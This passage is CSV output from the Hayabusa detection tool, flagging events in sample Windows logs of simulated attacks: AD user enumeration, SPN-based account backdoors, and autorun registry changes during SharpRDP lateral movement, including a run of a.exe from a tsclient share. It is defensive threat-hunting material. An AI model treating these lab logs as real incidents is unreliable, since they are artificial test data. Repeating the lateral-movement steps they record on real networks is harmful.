+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 
0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 
0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 
0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 
07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
